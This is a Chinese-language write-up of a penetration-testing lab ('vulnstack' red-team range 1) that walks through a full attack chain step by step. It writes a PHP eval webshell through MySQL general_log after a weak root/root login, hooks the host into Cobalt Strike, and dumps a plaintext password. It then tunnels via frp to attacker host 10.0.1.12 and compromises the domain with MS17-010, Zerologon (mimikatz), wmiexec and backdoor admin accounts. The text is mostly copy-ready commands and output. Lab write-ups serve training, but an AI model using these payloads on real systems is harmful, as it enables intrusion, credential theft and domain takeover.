靶场信息

地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

发布日期：2019年10月20日 14:05

难度：简单

目标：上线三个管理员权限靶机

标签: 内网渗透 | Kill Chain | 域渗透 | 威胁情报

百度网盘： https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset

密码: 下载密码：n1u2

环境配置

1）设置网卡信息

文章中的网卡设置如下

这里共使用了2张网卡，VMnet1和VMnet2，其中VMnet1连接有kali和第一个靶场，说明此网卡用来模拟公网ip，我本地使用NAT的VMnet8来代替，VMnet2内网网卡使用本地的VMnet6代替

查看第三个靶场的网卡配置

查看第三个靶场的网卡配置，需要把我本地的VMnet6设置为

ip地址：192.168.52.1
子网掩码：255.255.255.0
默认网关：192.168.52.2

VMware虚拟网络配置

子网ip：192.168.52.0
子网掩码：255.255.255.0
DHCP
ip范围：192.168.52.3-254

三个靶机网卡配置

第一个靶场windows7
双网卡：VMnet8（NAT）+VMnet6
这里需要注意，VMnet6的网卡所在的网络适配器IP是自定义的，NAT是自动获取，不能弄反
​
第二个靶场win2k3
网卡VMnet6
​
第三个靶场windows2008
网卡VMnet6
​
攻击机kali
网卡VMnet8（NAT）

2）win7靶机开启phpstudy

3）windows2008开启redis服务

一、信息收集

1）确定目标

使用netdiscover扫描10.0.1.0网段存活主机

netdiscover -r 10.0.1.0/24 -i eth0

得到ip地址：10.0.1.5

2）端口扫描

nmap -v -T4 -p- -A -oN nmap.log 10.0.1.5

phpstudy开的80和3306

3）访问靶机

http://10.0.1.5

探针里面已经泄露了网站的绝对路径

尝试一下，可以访问phpmyadmin，且mysql是弱口令root/root毫无套路

4）上线蚁剑

http://10.0.1.5/phpmyadmin

通过phpstudy开启的服务，使用弱口令连接phpmyadmin

写入webshell

show global variables like '%secure_file_priv%';
​
NULL    不允许导入或导出
/tmp    只允许在 /tmp 目录导入导出
空      不限制目录

这里是NULL，放弃这个into outfile，尝试写日志或者利用yxcms，既然在mysql窝里那就搞mysql吧

日志文件写 shell

SHOW VARIABLES LIKE 'general%';

general_log 默认关闭，开启它可以记录用户输入的每条命令，会把其保存在对应的日志文件中。 可以尝试自定义日志文件，并向日志文件里面写入内容的话，那么就可以成功 getshell：

# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/ch4nge.php';

# 查看当前配置
SHOW VARIABLES LIKE 'general%';

嘿嘿，成功

# 往日志里面写入 payload
select '<?php @eval($_POST[miss]);?>';

# 此时已经写到 ch4nge.php 文件当中了

蚁剑连接

嘿嘿 连上了

探测一下发现管理员权限还出网

5）补充：yxcms上线蚁剑方法

想搞yxcms可以参考我前面的文章https://www.freebuf.com/articles/web/277572.html

管理员登录需要修改r=admin

yxcms的默认用户名密码是admin/123456

在页面配置中可以修改页面源码，直接加入一句话就ok了。

6）上线CS

kali的ip是10.0.1.12，启动CS服务，建立监听生成远控马，蚁剑传进去执行上线

二、内网信息搜集

1）logonpasswords读取密码成功

hongrisec@2019

2）系统信息

systeminfo

主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
系统类型:         x64-based PC
域:               god.org
登录服务器:       \\OWA
修补程序:         安装了 4 个修补程序。
[01]: KB2534111
[02]: KB2999226
[03]: KB958488
[04]: KB976902

3）网卡信息

ipconfig /all

可以看出此靶机存在域中

域名：god.org
双网卡：
net1：10.0.1.5（模拟公网）
net2：192.168.52.143（可以看出这个是内网ip了）
DNS：192.168.52.138
这个DNS大概率是域控god.org的ip

4）端口服务信息

扫描到的东西好多啊。发现网段内存活的另外两台机器分别是138和141。三台竟然都有ms17010，没啥遗憾的，之前没有找到143这个漏洞是因为这个机器防火墙开了，外面扫不到

shell C:\Windows\Temp\fscan.exe -h 192.168.52.1/24

scan start
(ICMP) Target '192.168.52.138' is alive
(ICMP) Target '192.168.52.141' is alive
(ICMP) Target '192.168.52.143' is alive
icmp alive hosts len is: 3
192.168.52.138:135 open
192.168.52.138:80 open
192.168.52.143:135 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.143:445 open
192.168.52.138:445 open
192.168.52.141:135 open
192.168.52.141:445 open
192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
[->]stu1
[->]169.254.129.186
[->]192.168.52.143
[->]10.0.1.5
NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
192.168.52.141	MS17-010	(Windows Server 2003 3790)
NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
WebTitle:http://192.168.52.138:80 200 None
192.168.52.143:3306 open
192.168.52.141:7001 open
FTP:192.168.52.141:21:ftp admin123A
WebTitle:http://192.168.52.143:80 200 phpStudy 鎺㈤拡 2014 
192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
[->]stu1
[->]169.254.129.186
[->]192.168.52.143
[->]10.0.1.5
WebTitle:http://192.168.52.138:80 200 None
NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
192.168.52.141	MS17-010	(Windows Server 2003 3790)
192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
FTP:192.168.52.141:21:ftp admin123A

5）域内机器信息

使用CS的插件上传运行nbtscan进行扫描，或者自己上传nbtscan扫描

192.168.52.138  GOD\OWA                         SHARING DC
192.168.52.141  GOD\ROOT-TVI862UBEH             SHARING ?
192.168.52.143  GOD\STU1                        SHARING

三、frp打隧道

（1）配置文件

靶机：

# frpc.ini
[common]
server_addr = 10.0.1.12
server_port = 11608
[http_proxy]
type = tcp
remote_port = 11668
plugin = socks5

\/PS：

# frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 11608

先在\/PS建立服务端

./frps -c frps.ini

然后在靶机开启客户端

shell cd C:\Windows\Temp\ && frpc.exe -c frpc.ini

kali回显

proxychains设置：

10.0.1.12 11668

连接测试

经过测试，ftp连接登录后，无法获取目录

四、攻击192.168.52.138

1）思路描述

（1）思考1

在攻击过程中我发现没有建立IPC的时候windows7系统的web服务器中可以直接dir列出192.168.52.138和192.168.52.141两台机器的目录，这也是靶机域环境的一个漏洞

所以，我们可以对CS会话建立192.168.52.143（切记，不能写10.0.1.5）的中转监听，生成这个监听的木马，把马传到141和138的机器，然后使用永恒之蓝运行exe木马就可以上线

copy 64.exe \\192.168.52.141\c$\windows\system32\
copy 64.exe \\192.168.52.138\c$\windows\system32\

​（2）思考2

既然存在永恒之蓝漏洞，可以使用永恒之蓝漏洞新建用户并添加到本地administrators组，这里不能建立域用户。提示：建立用户是很容易被发现的~

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add

难用的方法：使用CS的会话建立IPC

net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge
# 这里发现从域普通用户IPC连接域普通用户，需要域管理员的账号才行，所以想用这个方法渗透到这个普通域用户机器需要在域控那里直接IPC连接（域信任），或者就是好用的方法wmiexec
net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge

#然后copy马过去，永恒之蓝去执行.永恒之蓝执行命令

好用的方法：通过隧道使用wmiexec连接获取shell,windows版本的wmiexec好用

wmiexec.exe ch4nge:QWEasd123@192.168.52.141

put 32.exe

注意192.168.52.141是win2003，是32位系统，木马要生成32位的

（3）思考3

哈希置零攻击CVE-2020-1472

上传mimikatz，CS上检测是否存在CVE-2020-1472漏洞，看图显示Authentication: OK -- vulnerable表示存在，可以用这个方式攻击域控。

注意这里的sccount从nbtscan得到

shell mimikatz "lsadump::zerologon /target:192.168.52.138 /account:OWA$" "exit"

141这个报错没见过，有师傅知道报错是什么原因导致的吗

2）永恒之蓝+wmiexec上线CS

​（1）建立中转监听

（2）生成32位和64位的木马

​64.exe和32.exe

（3）msfconsole设置代理

​setg Proxies socks5:10.0.1.12:11668
setg ReverseAllowProxy true

（4）使用ms17-010模块进行攻击

​msf6 > search ms17-010
msf6 > use 0

msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND ipconfig
COMMAND => ipconfig
msf6 auxiliary(admin/smb/ms17_010_command) > run

创建管理员组用户

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge

（5）192.168.52.141建立管理员组用户

​net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge

（6）建立IPC

​然后使用CS的会话建立IPC

net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge
net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge

删除IPC方法
net use \\192.168.52.141 /del /y

192.168.52.141建立IPC成功，但是不能使用dir列C盘目录，使用域管理员用户才有权限，好家伙，先上线域控再说

copy马过去，永恒之蓝去执行.永恒之蓝执行命令的当前路径是C:\windows\system32\

直接copy到这个路径

copy 64.exe \\192.168.52.138\c$\windows\system32\

执行木马，上线CS

msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138
rhosts => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 64.exe
COMMAND => 64.exe
msf6 auxiliary(admin/smb/ms17_010_command) > run

​（7）通过隧道使用wmiexec连接获取shell

​windows版本的wmiexec好用

当然啦，域控也可以这样上线

wmiexec.exe ch4nge:QWEasd123@192.168.52.141

put 32.exe

注意192.168.52.141是win2003，是32位系统，木马要生成32位的

总结

在打此靶场遇到一些问题总结如下

1.靶机中的域信任关系，域控可以直接dir 该域普通用户

2.域普通用户A对域普通用户B进行IPC的时候，要用B的域管理员用户才可以，本地管理员用户不可以；wmiexec使用B的本地用户和域管理员用户都可以连接

3.用wmiexec连接已知密码的靶机